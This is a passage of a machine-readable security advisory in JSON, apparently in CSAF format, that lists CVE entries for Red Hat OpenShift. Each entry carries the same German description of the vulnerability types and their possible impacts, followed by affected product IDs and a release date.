"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-43789"
},
{
"cve": "CVE-2023-4408",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-4408"
},
{
"cve": "CVE-2023-45286",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-45286"
},
{
"cve": "CVE-2023-45287",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-45287"
},
{
"cve": "CVE-2023-45288",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-45288"
},
{
"cve": "CVE-2023-45289",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-45289"
},
{
"cve": "CVE-2023-45290",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-45290"
},
{
"cve": "CVE-2023-45857",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-45857"
},
{
"cve": "CVE-2023-45863",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-45863"
},
{
"cve": "CVE-2023-46218",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-46218"
},
{
"cve": "CVE-2023-46862",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-46862"
},
{
"cve": "CVE-2023-47038",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-47038"
},
{
"cve": "CVE-2023-48631",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-48631"
},
{
"cve": "CVE-2023-50387",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-50387"
},
{
"cve": "CVE-2023-50868",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-50868"
},
{
"cve": "CVE-2023-51043",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-51043"
},
{
"cve": "CVE-2023-51779",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-51779"
},
{
"cve": "CVE-2023-51780",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-51780"
},
{
"cve": "CVE-2023-52425",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-52425"
},
{
"cve": "CVE-2023-52434",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-52434"
},
{
"cve": "CVE-2023-52448",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-52448"
},
{
"cve": "CVE-2023-52476",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-52476"
},
{
"cve": "CVE-2023-52489",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-52489"
},
{
"cve": "CVE-2023-52522",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-52522"
},
{
"cve": "CVE-2023-52529",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-52529"
},
{
"cve": "CVE-2023-52574",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-52574"
},
{
"cve": "CVE-2023-52578",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-52578"
},
{
"cve": "CVE-2023-52580",
"notes": [
{
"category": "description",
